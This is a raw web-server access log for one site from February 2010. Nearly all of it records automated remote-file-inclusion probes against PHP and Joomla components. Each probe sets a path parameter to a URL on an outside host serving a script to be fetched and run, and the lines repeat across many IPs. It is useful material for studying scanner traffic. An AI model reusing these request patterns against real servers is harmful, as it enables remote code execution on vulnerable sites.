83.103.72.130 - - [28/Feb/2010:16:41:34 -0800] "GET /logs/access_090907.log/?sourcedir=http://203.157.114.10/homepage/hinso//mambots/editors/sc1?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
62.173.161.146 - - [28/Feb/2010:16:41:55 -0800] "GET /logs/access.log//board/bbs/delete_all.php?board_skin_path=http://www.sun-angel.ru//js/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
62.173.161.146 - - [28/Feb/2010:16:42:01 -0800] "GET /logs/access_100118.log//board/bbs/delete_all.php?board_skin_path=http://www.sun-angel.ru//js/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
83.103.72.130 - - [28/Feb/2010:16:42:24 -0800] "GET /logs/?sourcedir=http://203.157.114.10/homepage/hinso//mambots/editors/sc1?? HTTP/1.1" 200 4942 "-" "Mozilla/5.0" "www.galf.org"
83.103.72.130 - - [28/Feb/2010:16:42:25 -0800] "GET /logs/access_090921.log/?sourcedir=http://203.157.114.10/homepage/hinso//mambots/editors/sc1?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
83.103.72.130 - - [28/Feb/2010:16:42:25 -0800] "GET /?sourcedir=http://203.157.114.10/homepage/hinso//mambots/editors/sc1?? HTTP/1.1" 200 1048 "-" "Mozilla/5.0" "www.galf.org"
83.103.72.130 - - [28/Feb/2010:16:42:44 -0800] "GET /logs/access_090907.log/?sourcedir=http://203.157.114.10/homepage/hinso//mambots/editors/sc1?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
62.173.161.146 - - [28/Feb/2010:16:43:12 -0800] "GET /logs/access_100104.log//components/com_joomlalib/standalone/stubjambo.php?baseDir=http://www.sun-angel.ru//js/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
216.119.103.16 - - [28/Feb/2010:16:47:08 -0800] "GET /logs/access_091221.log/components/com_sitemap/sitemap.php?mosConfig_admin_path=http://www.phimose-info.de/phimose-forum/Sources/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
193.138.158.46 - - [28/Feb/2010:16:49:40 -0800] "GET /logs/access_100125.log%20%20/agendax/addevent.inc.php?agendax_path=http://zerozon.co.kr/photos/count/columbus/cok1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
193.138.158.46 - - [28/Feb/2010:16:49:40 -0800] "GET /agendax/addevent.inc.php?agendax_path=http://zerozon.co.kr/photos/count/columbus/cok1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
193.138.158.46 - - [28/Feb/2010:16:49:40 -0800] "GET /logs/agendax/addevent.inc.php?agendax_path=http://zerozon.co.kr/photos/count/columbus/cok1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
83.103.72.130 - - [28/Feb/2010:16:49:45 -0800] "GET /logs/access_100125.log/?sourcedir=http://203.157.114.10/homepage/hinso//mambots/editors/sc1?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
62.173.161.146 - - [28/Feb/2010:16:49:47 -0800] "GET /logs/access_090720.log//components/com_joomlalib/standalone/stubjambo.php?baseDir=http://www.sun-angel.ru//js/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
83.103.72.130 - - [28/Feb/2010:16:50:28 -0800] "GET /logs/access_100125.log/?sourcedir=http://203.157.114.10/homepage/hinso//mambots/editors/sc1?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
193.138.158.46 - - [28/Feb/2010:16:50:30 -0800] "GET /agendax/addevent.inc.php?agendax_path=http://zerozon.co.kr/photos/count/columbus/cok1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
193.138.158.46 - - [28/Feb/2010:16:50:30 -0800] "GET /logs/agendax/addevent.inc.php?agendax_path=http://zerozon.co.kr/photos/count/columbus/cok1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
193.138.158.46 - - [28/Feb/2010:16:50:30 -0800] "GET /logs/access_100125.log/agendax/addevent.inc.php?agendax_path=http://zerozon.co.kr/photos/count/columbus/cok1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
193.138.158.46 - - [28/Feb/2010:16:50:39 -0800] "GET /logs/access_090824.log%20%20/agendax/addevent.inc.php?agendax_path=http://zerozon.co.kr/photos/count/columbus/cok1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
62.173.161.146 - - [28/Feb/2010:16:51:06 -0800] "GET /logs/access_091012.log//components/com_joomlalib/standalone/stubjambo.php?baseDir=http://www.sun-angel.ru//js/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
67.224.94.218 - - [28/Feb/2010:16:51:48 -0800] "GET /include/mail.inc.php?skin_board_path=http://www.sun-angel.ru//js/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
67.224.94.218 - - [28/Feb/2010:16:51:48 -0800] "GET /logs//include/mail.inc.php?skin_board_path=http://www.sun-angel.ru//js/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
67.224.94.218 - - [28/Feb/2010:16:51:48 -0800] "GET /logs/access_100118.log%20%20//include/mail.inc.php?skin_board_path=http://www.sun-angel.ru//js/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
69.64.70.246 - - [28/Feb/2010:16:51:50 -0800] "GET /logs//include/mail.inc.php?skin_board_path=http://www.sun-angel.ru//js/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
69.64.70.246 - - [28/Feb/2010:16:51:51 -0800] "GET /include/mail.inc.php?skin_board_path=http://www.sun-angel.ru//js/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
69.64.70.246 - - [28/Feb/2010:16:51:51 -0800] "GET /logs/access_100118.log%20%20//include/mail.inc.php?skin_board_path=http://www.sun-angel.ru//js/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
69.64.70.246 - - [28/Feb/2010:16:53:02 -0800] "GET /logs/access_090831.log%20%20//include/mail.inc.php?skin_board_path=http://www.sun-angel.ru//js/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
67.224.94.218 - - [28/Feb/2010:16:53:33 -0800] "GET /logs/access_090831.log%20%20//include/mail.inc.php?skin_board_path=http://www.sun-angel.ru//js/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
62.173.161.146 - - [28/Feb/2010:16:53:50 -0800] "GET /logs//include/mail.inc.php?skin_board_path=http://www.sun-angel.ru//js/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
62.173.161.146 - - [28/Feb/2010:16:53:50 -0800] "GET /include/mail.inc.php?skin_board_path=http://www.sun-angel.ru//js/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
62.173.161.146 - - [28/Feb/2010:16:53:50 -0800] "GET /logs/access_090914.log%20%20//include/mail.inc.php?skin_board_path=http://www.sun-angel.ru//js/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
193.138.158.46 - - [28/Feb/2010:16:54:43 -0800] "GET /agendax/addevent.inc.php?agendax_path=http://www.hfsb.org/sites/10225/img/.upload/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
193.138.158.46 - - [28/Feb/2010:16:54:43 -0800] "GET /logs/access_100125.log%20%20/agendax/addevent.inc.php?agendax_path=http://www.hfsb.org/sites/10225/img/.upload/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
193.138.158.46 - - [28/Feb/2010:16:54:43 -0800] "GET /logs/agendax/addevent.inc.php?agendax_path=http://www.hfsb.org/sites/10225/img/.upload/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
193.138.158.46 - - [28/Feb/2010:16:55:07 -0800] "GET /logs/agendax/addevent.inc.php?agendax_path=http://www.hfsb.org/sites/10225/img/.upload/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
193.138.158.46 - - [28/Feb/2010:16:55:07 -0800] "GET /logs/access_100125.log/agendax/addevent.inc.php?agendax_path=http://www.hfsb.org/sites/10225/img/.upload/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
193.138.158.46 - - [28/Feb/2010:16:55:07 -0800] "GET /agendax/addevent.inc.php?agendax_path=http://www.hfsb.org/sites/10225/img/.upload/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
200.201.180.130 - - [28/Feb/2010:16:55:16 -0800] "GET /logs/access_100201.log//board/bbs/delete_all.php?board_skin_path=http://www.naotemprec0.com.br/idx3.txt?? HTTP/1.1" 404 - "-" "libwww-perl/5.808" "www.galf.org"
193.138.158.46 - - [28/Feb/2010:16:55:25 -0800] "GET /logs/access_090824.log%20%20/agendax/addevent.inc.php?agendax_path=http://www.hfsb.org/sites/10225/img/.upload/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
200.201.180.130 - - [28/Feb/2010:16:57:28 -0800] "GET /logs/access_100201.log//board/bbs/delete_all.php?board_skin_path=http://www.naotemprec0.com.br/idx3.txt?? HTTP/1.1" 404 - "-" "libwww-perl/5.808" "www.galf.org"
69.64.70.246 - - [28/Feb/2010:16:57:36 -0800] "GET /include/mail.inc.php?skin_board_path=http://www.sun-angel.ru//js/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
69.64.70.246 - - [28/Feb/2010:16:57:36 -0800] "GET /logs//include/mail.inc.php?skin_board_path=http://www.sun-angel.ru//js/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
69.64.70.246 - - [28/Feb/2010:16:57:36 -0800] "GET /logs/access_091207.log//include/mail.inc.php?skin_board_path=http://www.sun-angel.ru//js/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
69.64.70.246 - - [28/Feb/2010:16:58:29 -0800] "GET /logs/access_090810.log//include/mail.inc.php?skin_board_path=http://www.sun-angel.ru//js/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
62.173.161.146 - - [28/Feb/2010:17:00:15 -0800] "GET /logs/access_091123.log%20%20//include/mail.inc.php?skin_board_path=http://www.sun-angel.ru//js/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
67.224.94.218 - - [28/Feb/2010:17:01:52 -0800] "GET /logs//include/mail.inc.php?skin_board_path=http://www.sun-angel.ru//js/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
67.224.94.218 - - [28/Feb/2010:17:01:52 -0800] "GET /logs/access_091207.log//include/mail.inc.php?skin_board_path=http://www.sun-angel.ru//js/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
67.224.94.218 - - [28/Feb/2010:17:01:52 -0800] "GET /include/mail.inc.php?skin_board_path=http://www.sun-angel.ru//js/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
67.224.94.218 - - [28/Feb/2010:17:02:57 -0800] "GET /logs/access_090810.log//include/mail.inc.php?skin_board_path=http://www.sun-angel.ru//js/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
193.138.158.46 - - [28/Feb/2010:17:02:59 -0800] "GET /trans/trans.php?trans=fr&page=http://www.hfsb.org/sites/10225/img/.upload/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
193.138.158.46 - - [28/Feb/2010:17:02:59 -0800] "GET /logs//trans/trans.php?trans=fr&page=http://www.hfsb.org/sites/10225/img/.upload/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
193.138.158.46 - - [28/Feb/2010:17:02:59 -0800] "GET /logs/access_091026.log%20%20//trans/trans.php?trans=fr&page=http://www.hfsb.org/sites/10225/img/.upload/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
85.92.222.254 - - [28/Feb/2010:17:05:13 -0800] "GET /logs HTTP/1.1" 301 88 "-" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; InfoPath.1; .NET CLR 2.0.50727; .NET CLR 1.1.4322; MS-RTC LM 8; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)" "www.galf.org"
85.92.222.254 - - [28/Feb/2010:17:05:14 -0800] "GET /logs/ HTTP/1.1" 200 4942 "-" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; InfoPath.1; .NET CLR 2.0.50727; .NET CLR 1.1.4322; MS-RTC LM 8; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)" "www.galf.org"
84.18.91.216 - - [28/Feb/2010:17:05:14 -0800] "GET /logs/ HTTP/1.1" 200 4942 "http://www.google.com/search?hl=en&q=index+of%2F+precash.log&aq=f&aqi=&aql=&oq=" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.1.8) Gecko/20100202 Firefox/3.5.8" "www.galf.org"
84.18.91.216 - - [28/Feb/2010:17:05:16 -0800] "GET /favicon.ico HTTP/1.1" 404 - "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.1.8) Gecko/20100202 Firefox/3.5.8" "www.galf.org"
84.18.91.216 - - [28/Feb/2010:17:05:19 -0800] "GET /favicon.ico HTTP/1.1" 404 - "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.1.8) Gecko/20100202 Firefox/3.5.8" "www.galf.org"
85.92.222.254 - - [28/Feb/2010:17:05:36 -0800] "GET /logs/access.log HTTP/1.1" 200 36456 "-" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; InfoPath.1; .NET CLR 2.0.50727; .NET CLR 1.1.4322; MS-RTC LM 8; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)" "www.galf.org"
84.18.91.216 - - [28/Feb/2010:17:05:37 -0800] "GET /logs/access.log HTTP/1.1" 200 36456 "http://www.galf.org/logs/" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.1.8) Gecko/20100202 Firefox/3.5.8" "www.galf.org"
62.173.161.146 - - [28/Feb/2010:17:07:33 -0800] "GET /logs/access_090831.log//include/mail.inc.php?skin_board_path=http://www.sun-angel.ru//js/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
67.224.94.218 - - [28/Feb/2010:17:08:13 -0800] "GET /logs/access.log//include/mail.inc.php?skin_board_path=http://www.sun-angel.ru//js/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
67.224.94.218 - - [28/Feb/2010:17:08:20 -0800] "GET /logs/access_090831.log//include/mail.inc.php?skin_board_path=http://www.sun-angel.ru//js/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
69.64.70.246 - - [28/Feb/2010:17:09:21 -0800] "GET /logs/access_100118.log//include/mail.inc.php?skin_board_path=http://www.sun-angel.ru//js/id1.txt?? HTTP/1.0" 404 - "-" "Mozilla/5.0" "www.galf.org"
64.15.152.132 - - [28/Feb/2010:17:09:36 -0800] "GET /txtsql//examples/txtSQLAdmin/startup.php?CFG[txtsql][class]=http://www.samer1.net/space/ray/1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
64.15.152.132 - - [28/Feb/2010:17:09:37 -0800] "GET /txtsql//examples/txtSQLAdmin/startup.php?CFG[txtsql][class]=http://www.samer1.net/space/ray/1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
64.15.152.132 - - [28/Feb/2010:17:09:37 -0800] "GET /logs//txtsql//examples/txtSQLAdmin/startup.php?CFG[txtsql][class]=http://www.samer1.net/space/ray/1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
64.15.152.132 - - [28/Feb/2010:17:09:38 -0800] "GET /logs//txtsql//examples/txtSQLAdmin/startup.php?CFG[txtsql][class]=http://www.samer1.net/space/ray/1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
64.15.152.132 - - [28/Feb/2010:17:09:38 -0800] "GET /logs/access_090921.log%20%20//txtsql//examples/txtSQLAdmin/startup.php?CFG[txtsql][class]=http://www.samer1.net/space/ray/1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
64.15.152.132 - - [28/Feb/2010:17:09:38 -0800] "GET /logs/access_090921.log%20%20//txtsql//examples/txtSQLAdmin/startup.php?CFG[txtsql][class]=http://www.samer1.net/space/ray/1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
64.15.152.132 - - [28/Feb/2010:17:09:51 -0800] "GET /txtsql//examples/txtSQLAdmin/startup.php?CFG[txtsql][class]=http://www.samer1.net/space/ray/1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
64.15.152.132 - - [28/Feb/2010:17:09:51 -0800] "GET /logs//txtsql//examples/txtSQLAdmin/startup.php?CFG[txtsql][class]=http://www.samer1.net/space/ray/1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
64.15.152.132 - - [28/Feb/2010:17:09:52 -0800] "GET /logs/access_090921.log//txtsql//examples/txtSQLAdmin/startup.php?CFG[txtsql][class]=http://www.samer1.net/space/ray/1.txt? HTTP/1.0" 404 - "-" "Mozilla/5.0" "www.galf.org"
62.173.161.146 - - [28/Feb/2010:17:10:03 -0800] "GET /logs/access_100118.log//include/mail.inc.php?skin_board_path=http://www.sun-angel.ru//js/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
64.15.152.132 - - [28/Feb/2010:17:10:06 -0800] "GET /txtsql//examples/txtSQLAdmin/startup.php?CFG[txtsql][class]=http://www.samer1.net/space/ray/1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
64.15.152.132 - - [28/Feb/2010:17:10:06 -0800] "GET /logs//txtsql//examples/txtSQLAdmin/startup.php?CFG[txtsql][class]=http://www.samer1.net/space/ray/1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
64.15.152.132 - - [28/Feb/2010:17:10:06 -0800] "GET /logs/access_090921.log//txtsql//examples/txtSQLAdmin/startup.php?CFG[txtsql][class]=http://www.samer1.net/space/ray/1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
64.15.152.132 - - [28/Feb/2010:17:11:10 -0800] "GET /logs/access_090810.log//txtsql//examples/txtSQLAdmin/startup.php?CFG[txtsql][class]=http://www.samer1.net/space/ray/1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
62.173.161.146 - - [28/Feb/2010:17:11:20 -0800] "GET /logs/access.log//include/mail.inc.php?skin_board_path=http://www.sun-angel.ru//js/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
64.15.152.132 - - [28/Feb/2010:17:11:27 -0800] "GET /logs/access_090810.log//txtsql//examples/txtSQLAdmin/startup.php?CFG[txtsql][class]=http://www.samer1.net/space/ray/1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
67.224.94.218 - - [28/Feb/2010:17:13:19 -0800] "GET /logs/access_100118.log//include/mail.inc.php?skin_board_path=http://www.sun-angel.ru//js/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
200.93.147.154 - - [28/Feb/2010:17:17:07 -0800] "GET /logs/////?_SERVER[DOCUMENT_ROOT]=http://www.howtolisten.kr//bbs/icon/private_name/img00.txt???? HTTP/1.1" 200 4950 "-" "Mozilla/5.0" "www.galf.org"
200.93.147.154 - - [28/Feb/2010:17:17:07 -0800] "GET ////?_SERVER[DOCUMENT_ROOT]=http://www.howtolisten.kr//bbs/icon/private_name/img00.txt???? HTTP/1.1" 200 1050 "-" "Mozilla/5.0" "www.galf.org"
200.93.147.154 - - [28/Feb/2010:17:17:11 -0800] "GET /logs/access_100215.log/////?_SERVER[DOCUMENT_ROOT]=http://www.howtolisten.kr//bbs/icon/private_name/img00.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
200.93.147.154 - - [28/Feb/2010:17:17:17 -0800] "GET /logs/access_100215.log/////?_SERVER[DOCUMENT_ROOT]=http://www.howtolisten.kr//bbs/icon/private_name/img00.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
200.93.147.154 - - [28/Feb/2010:17:17:17 -0800] "GET /logs/////?_SERVER[DOCUMENT_ROOT]=http://www.howtolisten.kr//bbs/icon/private_name/img00.txt???? HTTP/1.1" 200 4950 "-" "Mozilla/5.0" "www.galf.org"
200.93.147.154 - - [28/Feb/2010:17:17:20 -0800] "GET ////?_SERVER[DOCUMENT_ROOT]=http://www.howtolisten.kr//bbs/icon/private_name/img00.txt???? HTTP/1.1" 200 1050 "-" "Mozilla/5.0" "www.galf.org"
200.93.147.154 - - [28/Feb/2010:17:17:24 -0800] "GET ////?_SERVER[DOCUMENT_ROOT]=http://www.howtolisten.kr//bbs/icon/private_name/id1.txt??? HTTP/1.1" 200 1050 "-" "Mozilla/5.0" "www.galf.org"
200.93.147.154 - - [28/Feb/2010:17:17:25 -0800] "GET /logs/////?_SERVER[DOCUMENT_ROOT]=http://www.howtolisten.kr//bbs/icon/private_name/id1.txt??? HTTP/1.1" 200 4950 "-" "Mozilla/5.0" "www.galf.org"
200.93.147.154 - - [28/Feb/2010:17:17:28 -0800] "GET /logs/access_100215.log/////?_SERVER[DOCUMENT_ROOT]=http://www.howtolisten.kr//bbs/icon/private_name/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
200.93.147.154 - - [28/Feb/2010:17:17:36 -0800] "GET ////?_SERVER[DOCUMENT_ROOT]=http://www.howtolisten.kr//bbs/icon/private_name/id1.txt??? HTTP/1.1" 200 1050 "-" "Mozilla/5.0" "www.galf.org"
200.93.147.154 - - [28/Feb/2010:17:17:37 -0800] "GET /logs/access_100215.log/////?_SERVER[DOCUMENT_ROOT]=http://www.howtolisten.kr//bbs/icon/private_name/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
200.93.147.154 - - [28/Feb/2010:17:17:39 -0800] "GET /logs/////?_SERVER[DOCUMENT_ROOT]=http://www.howtolisten.kr//bbs/icon/private_name/id1.txt??? HTTP/1.1" 200 4950 "-" "Mozilla/5.0" "www.galf.org"
67.224.94.218 - - [28/Feb/2010:17:19:40 -0800] "GET /logs/access.log//include/mail.inc.php?skin_board_path=http://www.sun-angel.ru//js/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
200.93.147.154 - - [28/Feb/2010:17:21:45 -0800] "GET /logs/access_100215.log%20%20/////?_SERVER[DOCUMENT_ROOT]=http://www.howtolisten.kr//bbs/icon/private_name/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
200.93.147.154 - - [28/Feb/2010:17:21:59 -0800] "GET /logs/access_100215.log%20%20/////?_SERVER[DOCUMENT_ROOT]=http://www.howtolisten.kr//bbs/icon/private_name/img00.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
200.93.147.154 - - [28/Feb/2010:17:22:23 -0800] "GET /logs/access_100215.log%20%20/////?_SERVER[DOCUMENT_ROOT]=http://www.howtolisten.kr//bbs/icon/private_name/img00.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
200.93.147.154 - - [28/Feb/2010:17:22:32 -0800] "GET /logs/access_100118.log%20%20/////?_SERVER[DOCUMENT_ROOT]=http://www.howtolisten.kr//bbs/icon/private_name/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
200.93.147.154 - - [28/Feb/2010:17:23:02 -0800] "GET /logs/access_100118.log%20%20/////?_SERVER[DOCUMENT_ROOT]=http://www.howtolisten.kr//bbs/icon/private_name/img00.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
200.93.147.154 - - [28/Feb/2010:17:23:09 -0800] "GET /logs/access_100215.log%20%20/////?_SERVER[DOCUMENT_ROOT]=http://www.howtolisten.kr//bbs/icon/private_name/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
200.93.147.154 - - [28/Feb/2010:17:23:13 -0800] "GET /logs/access_100118.log%20%20/////?_SERVER[DOCUMENT_ROOT]=http://www.howtolisten.kr//bbs/icon/private_name/img00.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
124.115.6.14 - - [28/Feb/2010:17:23:38 -0800] "GET /robots.txt HTTP/1.1" 404 - "-" "Sosospider+(+http://help.soso.com/webspider.htm)" "www.galf.org"
208.115.111.245 - - [28/Feb/2010:17:23:42 -0800] "GET /robots.txt HTTP/1.1" 404 - "-" "Mozilla/5.0 (compatible; DotBot/1.1; http://www.dotnetdotcom.org/, crawler@dotnetdotcom.org)" "www.galf.org"
200.93.147.154 - - [28/Feb/2010:17:24:07 -0800] "GET /logs/access_100118.log%20%20/////?_SERVER[DOCUMENT_ROOT]=http://www.howtolisten.kr//bbs/icon/private_name/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
69.64.70.246 - - [28/Feb/2010:17:26:34 -0800] "GET /components/com_joomlalib/standalone/stubjambo.php?baseDir=http://www.sun-angel.ru//js/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
69.64.70.246 - - [28/Feb/2010:17:26:34 -0800] "GET /logs/access_091012.log%20%20//components/com_joomlalib/standalone/stubjambo.php?baseDir=http://www.sun-angel.ru//js/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
69.64.70.246 - - [28/Feb/2010:17:26:34 -0800] "GET /logs//components/com_joomlalib/standalone/stubjambo.php?baseDir=http://www.sun-angel.ru//js/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
67.224.94.218 - - [28/Feb/2010:17:27:08 -0800] "GET /components/com_joomlalib/standalone/stubjambo.php?baseDir=http://www.sun-angel.ru//js/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
67.224.94.218 - - [28/Feb/2010:17:27:09 -0800] "GET /logs//components/com_joomlalib/standalone/stubjambo.php?baseDir=http://www.sun-angel.ru//js/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
67.224.94.218 - - [28/Feb/2010:17:27:09 -0800] "GET /logs/access_091012.log%20%20//components/com_joomlalib/standalone/stubjambo.php?baseDir=http://www.sun-angel.ru//js/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
193.138.158.46 - - [28/Feb/2010:17:27:10 -0800] "GET /logs/access_091026.log//trans/trans.php?trans=fr&page=http://www.hfsb.org/sites/10225/img/.upload/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
62.173.161.146 - - [28/Feb/2010:17:27:57 -0800] "GET /logs//components/com_joomlalib/standalone/stubjambo.php?baseDir=http://www.sun-angel.ru//js/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
62.173.161.146 - - [28/Feb/2010:17:27:57 -0800] "GET /components/com_joomlalib/standalone/stubjambo.php?baseDir=http://www.sun-angel.ru//js/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
62.173.161.146 - - [28/Feb/2010:17:27:57 -0800] "GET /logs/access_091012.log%20%20//components/com_joomlalib/standalone/stubjambo.php?baseDir=http://www.sun-angel.ru//js/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
222.122.25.99 - - [28/Feb/2010:17:28:36 -0800] "GET /component/option,com_sitemap/components/com_sitemap/sitemap.php?mosConfig_admin_path=http://www.kecschool.co.kr/upfiles/c055/tp??? HTTP/1.1" 404 - "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; it; rv:1.8.1) Gecko/20060918 Firefox/2.0" "www.galf.org"
222.122.25.99 - - [28/Feb/2010:17:28:37 -0800] "GET /logs//component/option,com_sitemap/components/com_sitemap/sitemap.php?mosConfig_admin_path=http://www.kecschool.co.kr/upfiles/c055/tp??? HTTP/1.1" 404 - "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; it; rv:1.8.1) Gecko/20060918 Firefox/2.0" "www.galf.org"
208.98.1.242 - - [28/Feb/2010:17:28:48 -0800] "GET /modules/vwar/admin/admin.php?vwar_root=http://gesprachen.wewillhostit.com/copyright.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
208.98.1.242 - - [28/Feb/2010:17:28:48 -0800] "GET /logs/access_100111.log//modules/vwar/admin/admin.php?vwar_root=http://gesprachen.wewillhostit.com/copyright.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
208.98.1.242 - - [28/Feb/2010:17:28:48 -0800] "GET /logs//modules/vwar/admin/admin.php?vwar_root=http://gesprachen.wewillhostit.com/copyright.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
